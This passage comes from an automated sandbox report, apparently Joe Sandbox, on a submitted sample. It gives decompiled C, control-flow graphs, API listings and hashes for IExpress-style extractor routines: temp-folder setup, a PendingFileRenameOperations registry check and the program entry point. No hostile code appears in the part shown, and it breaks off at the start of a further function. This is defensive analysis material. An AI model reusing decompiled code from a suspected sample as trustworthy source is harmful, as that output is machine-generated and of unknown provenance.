                                                                                                                                                                                                      • Part of subcall function 00FD53A1: RemoveDirectoryA.KERNELBASE(?,?,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD53FB
                                                                                                                                                                                                      • Part of subcall function 00FD53A1: GetFileAttributesA.KERNELBASE(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5402
                                                                                                                                                                                                      • Part of subcall function 00FD53A1: GetTempFileNameA.KERNEL32(C:\Users\user\AppData\Local\Temp\IXP003.TMP\,IXP,00000000,?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD541F
                                                                                                                                                                                                      • Part of subcall function 00FD53A1: DeleteFileA.KERNEL32(?,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD542B
                                                                                                                                                                                                      • Part of subcall function 00FD53A1: CreateDirectoryA.KERNEL32(?,00000000,?,00000001,C:\Users\user\AppData\Local\Temp\IXP003.TMP\,00000000), ref: 00FD5434
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Directory$File$CreateRemove$AttributesDeleteInfoNameSystemTemp
                                                                                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\IXP003.TMP\$alpha$i386$mips$ppc
                                                                                                                                                                                                    • API String ID: 1979080616-4185119251
                                                                                                                                                                                                    • Opcode ID: f96fbfc8c77c3c567ca9e9ca51e84ee49fbc5f72a7b63f6db594dfb8419b57a1
                                                                                                                                                                                                    • Instruction ID: 45810f6e5edc7fc0af89af9f1ae88c52a3740d5f9aeb92ceb1e115e615c1018a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: f96fbfc8c77c3c567ca9e9ca51e84ee49fbc5f72a7b63f6db594dfb8419b57a1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D4315B71F01A15ABCB119F79BC04B7E779BBB81B54B0C012BA402C2340DF74CE01B696
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 519 fd256d-fd257d 520 fd2583-fd2589 519->520 521 fd2622-fd2627 call fd24e0 519->521 522 fd25e8-fd2607 RegOpenKeyExA 520->522 523 fd258b 520->523 526 fd2629-fd262f 521->526 528 fd2609-fd2620 RegQueryInfoKeyA 522->528 529 fd25e3-fd25e6 522->529 523->526 527 fd2591-fd2595 523->527 527->526 530 fd259b-fd25ba RegOpenKeyExA 527->530 531 fd25d1-fd25dd RegCloseKey 528->531 529->526 530->529 532 fd25bc-fd25cb RegQueryValueExA 530->532 531->529 532->531
                                                                                                                                                                                                    C-Code - Quality: 86%
                                                                                                                                                                                                    			E00FD256D(signed int __ecx) {
                                                                                                                                                                                                    				int _v8;
                                                                                                                                                                                                    				void* _v12;
                                                                                                                                                                                                    				signed int _t13;
                                                                                                                                                                                                    				signed int _t19;
                                                                                                                                                                                                    				long _t24;
                                                                                                                                                                                                    				void* _t26;
                                                                                                                                                                                                    				int _t31;
                                                                                                                                                                                                    				void* _t34;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_push(__ecx);
                                                                                                                                                                                                    				_t13 = __ecx & 0x0000ffff;
                                                                                                                                                                                                    				_t31 = 0;
                                                                                                                                                                                                    				if(_t13 == 0) {
                                                                                                                                                                                                    					_t31 = E00FD24E0(_t26);
                                                                                                                                                                                                    				} else {
                                                                                                                                                                                                    					_t34 = _t13 - 1;
                                                                                                                                                                                                    					if(_t34 == 0) {
                                                                                                                                                                                                    						_v8 = 0;
                                                                                                                                                                                                    						if(RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager\\FileRenameOperations", 0, 0x20019,  &_v12) != 0) {
                                                                                                                                                                                                    							goto L7;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							_t19 = RegQueryInfoKeyA(_v12, 0, 0, 0, 0, 0, 0,  &_v8, 0, 0, 0, 0);
                                                                                                                                                                                                    							goto L6;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						L12:
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						if(_t34 > 0 && __ecx <= 3) {
                                                                                                                                                                                                    							_v8 = 0;
                                                                                                                                                                                                    							_t24 = RegOpenKeyExA(0x80000002, "System\\CurrentControlSet\\Control\\Session Manager", 0, 0x20019,  &_v12); // executed
                                                                                                                                                                                                    							if(_t24 == 0) {
                                                                                                                                                                                                    								_t19 = RegQueryValueExA(_v12, "PendingFileRenameOperations", 0, 0, 0,  &_v8); // executed
                                                                                                                                                                                                    								L6:
                                                                                                                                                                                                    								asm("sbb eax, eax");
                                                                                                                                                                                                    								_v8 = _v8 &  !( ~_t19);
                                                                                                                                                                                                    								RegCloseKey(_v12); // executed
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							L7:
                                                                                                                                                                                                    							_t31 = _v8;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				return _t31;
                                                                                                                                                                                                    				goto L12;
                                                                                                                                                                                                    			}











                                                                                                                                                                                                    0x00fd2572
                                                                                                                                                                                                    0x00fd2573
                                                                                                                                                                                                    0x00fd2575
                                                                                                                                                                                                    0x00fd2578
                                                                                                                                                                                                    0x00fd257d
                                                                                                                                                                                                    0x00fd2627
                                                                                                                                                                                                    0x00fd2583
                                                                                                                                                                                                    0x00fd2586
                                                                                                                                                                                                    0x00fd2589
                                                                                                                                                                                                    0x00fd25eb
                                                                                                                                                                                                    0x00fd2607
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd2609
                                                                                                                                                                                                    0x00fd261a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd261a
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd258b
                                                                                                                                                                                                    0x00fd258b
                                                                                                                                                                                                    0x00fd259e
                                                                                                                                                                                                    0x00fd25b2
                                                                                                                                                                                                    0x00fd25ba
                                                                                                                                                                                                    0x00fd25cb
                                                                                                                                                                                                    0x00fd25d1
                                                                                                                                                                                                    0x00fd25d6
                                                                                                                                                                                                    0x00fd25da
                                                                                                                                                                                                    0x00fd25dd
                                                                                                                                                                                                    0x00fd25dd
                                                                                                                                                                                                    0x00fd25e3
                                                                                                                                                                                                    0x00fd25e3
                                                                                                                                                                                                    0x00fd25e3
                                                                                                                                                                                                    0x00fd258b
                                                                                                                                                                                                    0x00fd2589
                                                                                                                                                                                                    0x00fd262f
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • RegOpenKeyExA.KERNELBASE(80000002,System\CurrentControlSet\Control\Session Manager,00000000,00020019,?,00000000,00FD4096,00FD4096,?,00FD1ED3,00000001,00000000,?,?,00FD4137,?), ref: 00FD25B2
                                                                                                                                                                                                    • RegQueryValueExA.KERNELBASE(?,PendingFileRenameOperations,00000000,00000000,00000000,00FD4096,?,00FD1ED3,00000001,00000000,?,?,00FD4137,?,00FD4096), ref: 00FD25CB
                                                                                                                                                                                                    • RegCloseKey.KERNELBASE(?,?,00FD1ED3,00000001,00000000,?,?,00FD4137,?,00FD4096), ref: 00FD25DD
                                                                                                                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Session Manager\FileRenameOperations,00000000,00020019,?,00000000,00FD4096,00FD4096,?,00FD1ED3,00000001,00000000,?,?,00FD4137,?), ref: 00FD25FF
                                                                                                                                                                                                    • RegQueryInfoKeyA.ADVAPI32(?,00000000,00000000,00000000,00000000,00000000,00000000,00FD4096,00000000,00000000,00000000,00000000,?,00FD1ED3,00000001,00000000), ref: 00FD261A
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager, xrefs: 00FD25A8
                                                                                                                                                                                                    • PendingFileRenameOperations, xrefs: 00FD25C3
                                                                                                                                                                                                    • System\CurrentControlSet\Control\Session Manager\FileRenameOperations, xrefs: 00FD25F5
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: OpenQuery$CloseInfoValue
                                                                                                                                                                                                    • String ID: PendingFileRenameOperations$System\CurrentControlSet\Control\Session Manager$System\CurrentControlSet\Control\Session Manager\FileRenameOperations
                                                                                                                                                                                                    • API String ID: 2209512893-559176071
                                                                                                                                                                                                    • Opcode ID: 8c8b588f898c4e05446c0e94c89f2cc921d1653973db0828fca9d642a710a763
                                                                                                                                                                                                    • Instruction ID: 956068c985f883e9f2c3d45b8859ffe2d6701496d20f194f545c190bb7b34c00
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8c8b588f898c4e05446c0e94c89f2cc921d1653973db0828fca9d642a710a763
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 24118235D02228BB9B209BA29C0DDFB7F7EDF117A1F184057B808A2204D7318E45F6E1
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 533 fd6a60-fd6a91 call fd7155 call fd7208 GetStartupInfoW 539 fd6a93-fd6aa2 533->539 540 fd6abc-fd6abe 539->540 541 fd6aa4-fd6aa6 539->541 544 fd6abf-fd6ac5 540->544 542 fd6aaf-fd6aba Sleep 541->542 543 fd6aa8-fd6aad 541->543 542->539 543->544 545 fd6ac7-fd6acf _amsg_exit 544->545 546 fd6ad1-fd6ad7 544->546 547 fd6b0b-fd6b11 545->547 548 fd6ad9-fd6ae9 call fd6c3f 546->548 549 fd6b05 546->549 550 fd6b2e-fd6b30 547->550 551 fd6b13-fd6b24 _initterm 547->551 555 fd6aee-fd6af2 548->555 549->547 553 fd6b3b-fd6b42 550->553 554 fd6b32-fd6b39 550->554 551->550 556 fd6b44-fd6b51 call fd7060 553->556 557 fd6b67-fd6b71 553->557 554->553 555->547 558 fd6af4-fd6b00 555->558 556->557 569 fd6b53-fd6b65 556->569 561 fd6b74-fd6b79 557->561 559 fd6c39-fd6c3e call fd724d 558->559 564 fd6b7b-fd6b7d 561->564 565 fd6bc5-fd6bc8 561->565 566 fd6b7f-fd6b81 564->566 567 fd6b94-fd6b98 564->567 570 fd6bca-fd6bd3 565->570 571 fd6bd6-fd6be3 _ismbblead 565->571 566->565 572 fd6b83-fd6b85 566->572 573 fd6b9a-fd6b9e 567->573 574 fd6ba0-fd6ba2 567->574 569->557 570->571 575 fd6be9-fd6bed 571->575 576 fd6be5-fd6be6 571->576 572->567 577 fd6b87-fd6b8a 572->577 578 fd6ba3-fd6bbc call fd2bfb 573->578 574->578 575->561 576->575 577->567 580 fd6b8c-fd6b92 577->580 583 fd6c1e-fd6c25 578->583 584 fd6bbe-fd6bbf exit 578->584 580->572 585 fd6c27-fd6c2d _cexit 583->585 586 fd6c32 583->586 584->565 585->586 586->559
                                                                                                                                                                                                    C-Code - Quality: 51%
                                                                                                                                                                                                    			_entry_(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                                                                                                                                    				signed int* _t25;
                                                                                                                                                                                                    				signed int _t26;
                                                                                                                                                                                                    				signed int _t29;
                                                                                                                                                                                                    				int _t30;
                                                                                                                                                                                                    				signed int _t37;
                                                                                                                                                                                                    				signed char _t41;
                                                                                                                                                                                                    				signed int _t53;
                                                                                                                                                                                                    				signed int _t54;
                                                                                                                                                                                                    				intOrPtr _t56;
                                                                                                                                                                                                    				signed int _t58;
                                                                                                                                                                                                    				signed int _t59;
                                                                                                                                                                                                    				intOrPtr* _t60;
                                                                                                                                                                                                    				void* _t62;
                                                                                                                                                                                                    				void* _t67;
                                                                                                                                                                                                    				void* _t68;
                                                                                                                                                                                                    
                                                                                                                                                                                                    				E00FD7155();
                                                                                                                                                                                                    				_push(0x58);
                                                                                                                                                                                                    				_push(0xfd72b8);
                                                                                                                                                                                                    				E00FD7208(__ebx, __edi, __esi);
                                                                                                                                                                                                    				 *(_t62 - 0x20) = 0;
                                                                                                                                                                                                    				GetStartupInfoW(_t62 - 0x68);
                                                                                                                                                                                                    				 *((intOrPtr*)(_t62 - 4)) = 0;
                                                                                                                                                                                                    				_t56 =  *((intOrPtr*)( *[fs:0x18] + 4));
                                                                                                                                                                                                    				_t53 = 0;
                                                                                                                                                                                                    				while(1) {
                                                                                                                                                                                                    					asm("lock cmpxchg [edx], ecx");
                                                                                                                                                                                                    					if(0 == 0) {
                                                                                                                                                                                                    						break;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					if(0 != _t56) {
                                                                                                                                                                                                    						Sleep(0x3e8);
                                                                                                                                                                                                    						continue;
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_t58 = 1;
                                                                                                                                                                                                    						_t53 = 1;
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L7:
                                                                                                                                                                                                    					_t67 =  *0xfd88b0 - _t58; // 0x2
                                                                                                                                                                                                    					if(_t67 != 0) {
                                                                                                                                                                                                    						__eflags =  *0xfd88b0; // 0x2
                                                                                                                                                                                                    						if(__eflags != 0) {
                                                                                                                                                                                                    							 *0xfd81e4 = _t58;
                                                                                                                                                                                                    							goto L13;
                                                                                                                                                                                                    						} else {
                                                                                                                                                                                                    							 *0xfd88b0 = _t58;
                                                                                                                                                                                                    							_t37 = E00FD6C3F(0xfd10b8, 0xfd10c4); // executed
                                                                                                                                                                                                    							__eflags = _t37;
                                                                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                                                                    								goto L13;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    								_t30 = 0xff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					} else {
                                                                                                                                                                                                    						_push(0x1f);
                                                                                                                                                                                                    						L00FD6FF4();
                                                                                                                                                                                                    						L13:
                                                                                                                                                                                                    						_t68 =  *0xfd88b0 - _t58; // 0x2
                                                                                                                                                                                                    						if(_t68 == 0) {
                                                                                                                                                                                                    							_push(0xfd10b4);
                                                                                                                                                                                                    							_push(0xfd10ac);
                                                                                                                                                                                                    							L00FD7202();
                                                                                                                                                                                                    							 *0xfd88b0 = 2;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						if(_t53 == 0) {
                                                                                                                                                                                                    							 *0xfd88ac = 0;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t71 =  *0xfd88b4;
                                                                                                                                                                                                    						if( *0xfd88b4 != 0 && E00FD7060(_t71, 0xfd88b4) != 0) {
                                                                                                                                                                                                    							_t60 =  *0xfd88b4; // 0x0
                                                                                                                                                                                                    							 *0xfda288(0, 2, 0);
                                                                                                                                                                                                    							 *_t60();
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    						_t25 = __imp___acmdln; // 0x74895b9c
                                                                                                                                                                                                    						_t59 =  *_t25;
                                                                                                                                                                                                    						 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						_t54 =  *(_t62 - 0x20);
                                                                                                                                                                                                    						while(1) {
                                                                                                                                                                                                    							_t41 =  *_t59;
                                                                                                                                                                                                    							if(_t41 > 0x20) {
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							if(_t41 != 0) {
                                                                                                                                                                                                    								if(_t54 != 0) {
                                                                                                                                                                                                    									goto L32;
                                                                                                                                                                                                    								} else {
                                                                                                                                                                                                    									while(_t41 != 0 && _t41 <= 0x20) {
                                                                                                                                                                                                    										_t59 = _t59 + 1;
                                                                                                                                                                                                    										 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    										_t41 =  *_t59;
                                                                                                                                                                                                    									}
                                                                                                                                                                                                    								}
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *(_t62 - 0x3c) & 0x00000001;
                                                                                                                                                                                                    							if(( *(_t62 - 0x3c) & 0x00000001) == 0) {
                                                                                                                                                                                                    								_t29 = 0xa;
                                                                                                                                                                                                    							} else {
                                                                                                                                                                                                    								_t29 =  *(_t62 - 0x38) & 0x0000ffff;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_push(_t29);
                                                                                                                                                                                                    							_t30 = E00FD2BFB(0xfd0000, 0, _t59); // executed
                                                                                                                                                                                                    							 *0xfd81e0 = _t30;
                                                                                                                                                                                                    							__eflags =  *0xfd81f8;
                                                                                                                                                                                                    							if( *0xfd81f8 == 0) {
                                                                                                                                                                                                    								exit(_t30); // executed
                                                                                                                                                                                                    								goto L32;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							__eflags =  *0xfd81e4;
                                                                                                                                                                                                    							if( *0xfd81e4 == 0) {
                                                                                                                                                                                                    								__imp___cexit();
                                                                                                                                                                                                    								_t30 =  *0xfd81e0; // 0x0
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							 *((intOrPtr*)(_t62 - 4)) = 0xfffffffe;
                                                                                                                                                                                                    							goto L40;
                                                                                                                                                                                                    							L32:
                                                                                                                                                                                                    							__eflags = _t41 - 0x22;
                                                                                                                                                                                                    							if(_t41 == 0x22) {
                                                                                                                                                                                                    								__eflags = _t54;
                                                                                                                                                                                                    								_t15 = _t54 == 0;
                                                                                                                                                                                                    								__eflags = _t15;
                                                                                                                                                                                                    								_t54 = 0 | _t15;
                                                                                                                                                                                                    								 *(_t62 - 0x20) = _t54;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t26 = _t41 & 0x000000ff;
                                                                                                                                                                                                    							__imp___ismbblead(_t26);
                                                                                                                                                                                                    							__eflags = _t26;
                                                                                                                                                                                                    							if(_t26 != 0) {
                                                                                                                                                                                                    								_t59 = _t59 + 1;
                                                                                                                                                                                                    								__eflags = _t59;
                                                                                                                                                                                                    								 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    							}
                                                                                                                                                                                                    							_t59 = _t59 + 1;
                                                                                                                                                                                                    							 *(_t62 - 0x1c) = _t59;
                                                                                                                                                                                                    						}
                                                                                                                                                                                                    					}
                                                                                                                                                                                                    					L40:
                                                                                                                                                                                                    					return E00FD724D(_t30);
                                                                                                                                                                                                    				}
                                                                                                                                                                                                    				_t58 = 1;
                                                                                                                                                                                                    				__eflags = 1;
                                                                                                                                                                                                    				goto L7;
                                                                                                                                                                                                    			}


















                                                                                                                                                                                                    0x00fd6a60
                                                                                                                                                                                                    0x00fd6a6a
                                                                                                                                                                                                    0x00fd6a6c
                                                                                                                                                                                                    0x00fd6a71
                                                                                                                                                                                                    0x00fd6a78
                                                                                                                                                                                                    0x00fd6a7f
                                                                                                                                                                                                    0x00fd6a85
                                                                                                                                                                                                    0x00fd6a8e
                                                                                                                                                                                                    0x00fd6a91
                                                                                                                                                                                                    0x00fd6a93
                                                                                                                                                                                                    0x00fd6a9c
                                                                                                                                                                                                    0x00fd6aa2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6aa6
                                                                                                                                                                                                    0x00fd6ab4
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6aa8
                                                                                                                                                                                                    0x00fd6aaa
                                                                                                                                                                                                    0x00fd6aab
                                                                                                                                                                                                    0x00fd6aab
                                                                                                                                                                                                    0x00fd6abf
                                                                                                                                                                                                    0x00fd6abf
                                                                                                                                                                                                    0x00fd6ac5
                                                                                                                                                                                                    0x00fd6ad1
                                                                                                                                                                                                    0x00fd6ad7
                                                                                                                                                                                                    0x00fd6b05
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6ad9
                                                                                                                                                                                                    0x00fd6ad9
                                                                                                                                                                                                    0x00fd6ae9
                                                                                                                                                                                                    0x00fd6af0
                                                                                                                                                                                                    0x00fd6af2
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6af4
                                                                                                                                                                                                    0x00fd6af4
                                                                                                                                                                                                    0x00fd6afb
                                                                                                                                                                                                    0x00fd6afb
                                                                                                                                                                                                    0x00fd6af2
                                                                                                                                                                                                    0x00fd6ac7
                                                                                                                                                                                                    0x00fd6ac7
                                                                                                                                                                                                    0x00fd6ac9
                                                                                                                                                                                                    0x00fd6b0b
                                                                                                                                                                                                    0x00fd6b0b
                                                                                                                                                                                                    0x00fd6b11
                                                                                                                                                                                                    0x00fd6b13
                                                                                                                                                                                                    0x00fd6b18
                                                                                                                                                                                                    0x00fd6b1d
                                                                                                                                                                                                    0x00fd6b24
                                                                                                                                                                                                    0x00fd6b24
                                                                                                                                                                                                    0x00fd6b30
                                                                                                                                                                                                    0x00fd6b39
                                                                                                                                                                                                    0x00fd6b39
                                                                                                                                                                                                    0x00fd6b3b
                                                                                                                                                                                                    0x00fd6b42
                                                                                                                                                                                                    0x00fd6b57
                                                                                                                                                                                                    0x00fd6b5f
                                                                                                                                                                                                    0x00fd6b65
                                                                                                                                                                                                    0x00fd6b65
                                                                                                                                                                                                    0x00fd6b67
                                                                                                                                                                                                    0x00fd6b6c
                                                                                                                                                                                                    0x00fd6b6e
                                                                                                                                                                                                    0x00fd6b71
                                                                                                                                                                                                    0x00fd6b74
                                                                                                                                                                                                    0x00fd6b74
                                                                                                                                                                                                    0x00fd6b79
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6b7d
                                                                                                                                                                                                    0x00fd6b81
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6b83
                                                                                                                                                                                                    0x00fd6b8c
                                                                                                                                                                                                    0x00fd6b8d
                                                                                                                                                                                                    0x00fd6b90
                                                                                                                                                                                                    0x00fd6b90
                                                                                                                                                                                                    0x00fd6b83
                                                                                                                                                                                                    0x00fd6b81
                                                                                                                                                                                                    0x00fd6b94
                                                                                                                                                                                                    0x00fd6b98
                                                                                                                                                                                                    0x00fd6ba2
                                                                                                                                                                                                    0x00fd6b9a
                                                                                                                                                                                                    0x00fd6b9a
                                                                                                                                                                                                    0x00fd6b9a
                                                                                                                                                                                                    0x00fd6ba3
                                                                                                                                                                                                    0x00fd6bab
                                                                                                                                                                                                    0x00fd6bb0
                                                                                                                                                                                                    0x00fd6bb5
                                                                                                                                                                                                    0x00fd6bbc
                                                                                                                                                                                                    0x00fd6bbf
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6bbf
                                                                                                                                                                                                    0x00fd6c1e
                                                                                                                                                                                                    0x00fd6c25
                                                                                                                                                                                                    0x00fd6c27
                                                                                                                                                                                                    0x00fd6c2d
                                                                                                                                                                                                    0x00fd6c2d
                                                                                                                                                                                                    0x00fd6c32
                                                                                                                                                                                                    0x00000000
                                                                                                                                                                                                    0x00fd6bc5
                                                                                                                                                                                                    0x00fd6bc5
                                                                                                                                                                                                    0x00fd6bc8
                                                                                                                                                                                                    0x00fd6bcc
                                                                                                                                                                                                    0x00fd6bce
                                                                                                                                                                                                    0x00fd6bce
                                                                                                                                                                                                    0x00fd6bd1
                                                                                                                                                                                                    0x00fd6bd3
                                                                                                                                                                                                    0x00fd6bd3
                                                                                                                                                                                                    0x00fd6bd6
                                                                                                                                                                                                    0x00fd6bda
                                                                                                                                                                                                    0x00fd6be1
                                                                                                                                                                                                    0x00fd6be3
                                                                                                                                                                                                    0x00fd6be5
                                                                                                                                                                                                    0x00fd6be5
                                                                                                                                                                                                    0x00fd6be6
                                                                                                                                                                                                    0x00fd6be6
                                                                                                                                                                                                    0x00fd6be9
                                                                                                                                                                                                    0x00fd6bea
                                                                                                                                                                                                    0x00fd6bea
                                                                                                                                                                                                    0x00fd6b74
                                                                                                                                                                                                    0x00fd6c39
                                                                                                                                                                                                    0x00fd6c3e
                                                                                                                                                                                                    0x00fd6c3e
                                                                                                                                                                                                    0x00fd6abe
                                                                                                                                                                                                    0x00fd6abe
                                                                                                                                                                                                    0x00000000

                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00FD7155: GetSystemTimeAsFileTime.KERNEL32(00000000), ref: 00FD7182
                                                                                                                                                                                                      • Part of subcall function 00FD7155: GetCurrentProcessId.KERNEL32 ref: 00FD7191
                                                                                                                                                                                                      • Part of subcall function 00FD7155: GetCurrentThreadId.KERNEL32 ref: 00FD719A
                                                                                                                                                                                                      • Part of subcall function 00FD7155: GetTickCount.KERNEL32 ref: 00FD71A3
                                                                                                                                                                                                      • Part of subcall function 00FD7155: QueryPerformanceCounter.KERNEL32(?), ref: 00FD71B8
                                                                                                                                                                                                    • GetStartupInfoW.KERNEL32(?,00FD72B8,00000058), ref: 00FD6A7F
                                                                                                                                                                                                    • Sleep.KERNEL32(000003E8), ref: 00FD6AB4
                                                                                                                                                                                                    • _amsg_exit.MSVCRT ref: 00FD6AC9
                                                                                                                                                                                                    • _initterm.MSVCRT ref: 00FD6B1D
                                                                                                                                                                                                    • __IsNonwritableInCurrentImage.LIBCMT ref: 00FD6B49
                                                                                                                                                                                                    • exit.KERNELBASE ref: 00FD6BBF
                                                                                                                                                                                                    • _ismbblead.MSVCRT ref: 00FD6BDA
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000003.00000002.378203411.0000000000FD1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00FD0000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000003.00000002.378192646.0000000000FD0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378223706.0000000000FD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDA000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000003.00000002.378238170.0000000000FDC000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_3_2_fd0000_plvy67MJ29.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Current$Time$CountCounterFileImageInfoNonwritablePerformanceProcessQuerySleepStartupSystemThreadTick_amsg_exit_initterm_ismbbleadexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 836923961-0
                                                                                                                                                                                                    • Opcode ID: a6103f49f7bb743d56fa7f53c6093c26adc5a52e4573b392f3772356491f292a
                                                                                                                                                                                                    • Instruction ID: 575c2cd32e0a087360c491f454da633f41695d21087598f79aadd4cf887b3149
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a6103f49f7bb743d56fa7f53c6093c26adc5a52e4573b392f3772356491f292a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E841D231D453699BDB21AB78DC05B6A77A3FB84761F1C411BE841E7390DB788842BB81
                                                                                                                                                                                                    Uniqueness

                                                                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                                                                    Control-flow Graph

                                                                                                                                                                                                    • Executed
                                                                                                                                                                                                    • Not Executed
                                                                                                                                                                                                    control_flow_graph 587 fd58c8-fd58d5 588 fd58d8-fd58dd 587->588 588->588 589 fd58df-fd58f1 LocalAlloc 588->589 590 fd5919-fd5959 call fd1680 call fd658a CreateFileA LocalFree 589->590 591 fd58f3-fd5901 call fd44b9 589->591 594 fd5906-fd5910 call fd6285 590->594 601 fd595b-fd596c CloseHandle GetFileAttributesA 590->601 591->594 600 fd5912-fd5918 594->600 601->594 602 fd596e-fd5970 601->602 602->594 603 fd5972-fd597b 602->603 603->600
                                                                                                                                                                                                    C-Code - Quality: 95%
                                                                                                                                                                                                    			E00FD58C8(intOrPtr* __ecx) {
